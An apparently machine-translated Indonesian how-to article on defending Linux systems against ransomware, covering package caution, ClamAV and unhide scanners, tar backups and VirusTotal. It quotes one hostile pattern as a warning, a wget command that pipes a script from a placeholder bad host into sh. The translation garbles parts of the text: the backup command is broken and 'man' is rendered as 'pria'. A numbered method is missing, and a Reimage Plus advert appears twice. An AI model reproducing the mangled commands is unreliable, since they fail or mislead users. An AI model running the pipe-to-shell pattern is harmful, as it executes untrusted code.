Cara Melindungi Linux dari Ransomwares

Ransomware adalah salah satu masalah yang lebih mengancam dalam dunia keamanan jaringan saat ini. Ini menakutkan untuk berpikir bahwa seseorang dapat menahan sandera data Anda. Beberapa infeksi ransomware mengenkripsi semua data pada volume tertentu, dan orang-orang di belakangnya menuntut sejumlah uang tertentu sebelum mereka setuju untuk melepaskan kunci yang diperlukan untuk membuka kunci data tersebut. Khususnya bagi orang-orang yang memiliki banyak uang yang diinvestasikan dalam data mereka. Ada sedikit kabar baik bagi pengguna Linux, namun.

Dalam sebagian besar situasi, kode ransomware sulit untuk mengontrol apa pun lebih dari sekadar direktori home pengguna. Program-program ini tidak memiliki izin untuk membuang seluruh pemasangan. Inilah sebabnya mengapa Linux ransomware lebih bermasalah pada server di mana operator selalu memiliki akses root. Ransomware seharusnya tidak menjadi masalah bagi pengguna Linux, dan ada beberapa langkah yang harus diambil untuk mencegahnya terjadi pada Anda.

Metode 1: Bertahan dari Serangan BashCrypt-style

BasyCrypt adalah bukti potongan konsep ransomware yang membuktikan bahwa mungkin untuk menginfeksi struktur server dengan jenis kode berbahaya ini. Ini memberikan dasar untuk apa paket ransomware Linux mungkin terlihat seperti. Meskipun saat ini mereka tidak umum, langkah-langkah pencegahan akal sehat yang sama untuk administrator server dari platform lain juga bekerja dengan baik di sini. Masalahnya adalah bahwa di lingkungan tingkat perusahaan mungkin ada sejumlah besar orang yang berbeda menggunakan sistem host.

Jika Anda menjalankan server email, itu bisa sangat sulit untuk mencegah orang melakukan hal-hal bodoh. Lakukan yang terbaik untuk mengingatkan semua orang agar tidak membuka lampiran yang tidak mereka yakini, dan selalu malware memindai semua hal yang dipertanyakan. Satu hal lain yang benar-benar dapat membantu mencegah serangan semacam ini adalah dari melihat bagaimana Anda menginstal binari dengan wget. Biasanya server email Anda mungkin tidak memiliki lingkungan desktop sama sekali dan Anda mungkin menggunakan wget, apt-get, yum, atau pacman untuk mengelola paket yang datang. Sangat penting untuk melihat repositori apa yang digunakan dalam instalasi ini. Kadang-kadang Anda juga akan melihat perintah yang ingin Anda mengeksekusi sesuatu seperti wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, atau mungkin di dalam skrip shell. Dengan cara apa pun, jangan jalankan jika Anda tidak tahu untuk apa repositori itu.

Metode 2: Memasang Paket Pemindai

Beberapa potongan teknologi pemindaian malware open source ada. ClamAV sejauh ini yang paling terkenal, dan Anda dapat menginstalnya pada banyak distribusi berbasis-apt dengan menggunakan:

sudo apt-get install clamav

Ketika dipasang, pria clamav harus menjelaskan penggunaannya dalam bahasa sederhana. Perlu diingat bahwa meskipun dapat memindai dan menghapus file yang terinfeksi, itu tidak dapat benar-benar menghapus kode infeksi dari file. Ini adalah situasi semua atau tidak sama sekali.

Ada pemindai kedua yang mungkin tidak Anda kenal, tetapi berguna jika proses tersembunyi yang menakut-nakuti Anda. Sekali lagi jika Anda menggunakan distribusi berbasis apt, kemudian jalankan perintah ini untuk menginstal pemindai unhide:

sudo apt-get install unhide

TIP PRO: Jika masalahnya ada pada komputer Anda atau laptop / notebook, Anda harus mencoba menggunakan Perangkat Lunak Reimage Plus yang dapat memindai repositori dan mengganti file yang rusak dan hilang. Ini berfungsi dalam banyak kasus, di mana masalah ini berasal karena sistem yang rusak. Anda dapat mengunduh Reimage Plus dengan Mengklik di Sini

Saat dipasang, ketik:

sudo unhide sys

Ini akan melakukan pemindaian penuh sistem Anda untuk semua proses tersembunyi.

Metode 4: Menjaga Cadangan Bersih di Tangan

Meskipun hal ini seharusnya tidak menjadi masalah karena setiap orang harus selalu membuat cadangan, memiliki cadangan yang baik dapat langsung mengeluarkan ransomware. Apa yang sangat sedikit ransomware ada di platform Linux cenderung menyerang file dengan ekstensi yang khusus untuk platform pengembangan Web. Ini berarti jika Anda memiliki banyak kode .php, .xml, atau .js yang ada di sekitar, Anda secara khusus ingin mencadangkannya. Pertimbangkan baris kode berikut ini:

tar -cf backups.tar $ (cari -name * .ruby -or -name * .html)

Ini harus membuat file arsip pita besar dari setiap file dengan ekstensi .ruby dan .html dalam struktur file. Kemudian dapat dipindahkan ke subdirektori sementara yang berbeda untuk ekstraksi untuk memastikan bahwa pembuatannya berfungsi dengan benar.

Arsip rekaman ini dapat dan harus dipindahkan ke volume eksternal. Anda tentu saja dapat menggunakan kompresi .bz2, .gz atau .xv sebelum melakukannya. Anda mungkin ingin membuat cadangan mirror dengan menyalinnya ke dua volume yang berbeda.

Metode 5: Menggunakan Pemindai Berbasis Web

Mungkin Anda telah mengunduh paket RPM atau DEB dari situs yang menjanjikan berisi perangkat lunak yang bermanfaat. Perangkat lunak juga didistribusikan melalui 7z atau file tar terkompresi juga. Pengguna seluler juga dapat menerima paket Android dalam format APK. Sangat mudah untuk memindai ini dengan alat yang tepat di browser Anda. Arahkan ke https://www.virustotal.com/, dan setelah pemuatan halaman tekan tombol Pilih File. Sebelum mengunggah, perlu diingat bahwa ini adalah server publik. Meskipun aman dan dijalankan oleh Alphabet Inc, ia mentransfer file secara publik, yang mungkin menjadi masalah di beberapa lingkungan super-aman. Ini juga terbatas pada 128 file MB.

Pilih file Anda di kotak yang muncul dan pilih buka. Nama file akan muncul di baris di sebelah tombol setelah kotak lenyap.

Klik pada besar biru Pindai! tombol. Anda akan melihat kotak lain yang menunjukkan bahwa sistem sedang mengunggah file Anda.

Jika seseorang sudah memeriksa file sebelumnya, maka itu akan memberi tahu Anda tentang laporan sebelumnya. Ini mengenali ini berdasarkan jumlah SHA256, yang bekerja dengan cara yang sama seperti alat baris perintah Linux yang sama yang biasa Anda gunakan. Jika tidak, maka akan menjalankan pemindaian penuh dengan 53 program pemindaian yang berbeda. Beberapa dari mereka mungkin kehabisan waktu ketika file dijalankan, dan hasil ini dapat dengan aman diabaikan.

Beberapa program mungkin mengembalikan hasil yang berbeda dari yang lain, sehingga mudah menyingkirkan kesalahan positif dengan sistem ini. Bagian yang terbaik adalah ia bekerja di antara platform yang berbeda, yang membuatnya sama menariknya terlepas dari distribusi yang Anda miliki di perangkat yang berbeda. Ini juga berfungsi dengan baik dari distribusi seluler seperti Android, yang lagi-lagi adalah cara yang bagus untuk memeriksa paket APK sebelum menggunakannya.

TIP PRO: Jika masalahnya ada pada komputer Anda atau laptop / notebook, Anda harus mencoba menggunakan Perangkat Lunak Reimage Plus yang dapat memindai repositori dan mengganti file yang rusak dan hilang. Ini berfungsi dalam banyak kasus, di mana masalah ini berasal karena sistem yang rusak. Anda dapat mengunduh Reimage Plus dengan Mengklik di Sini

Facebook Twitter Google Plus Pinterest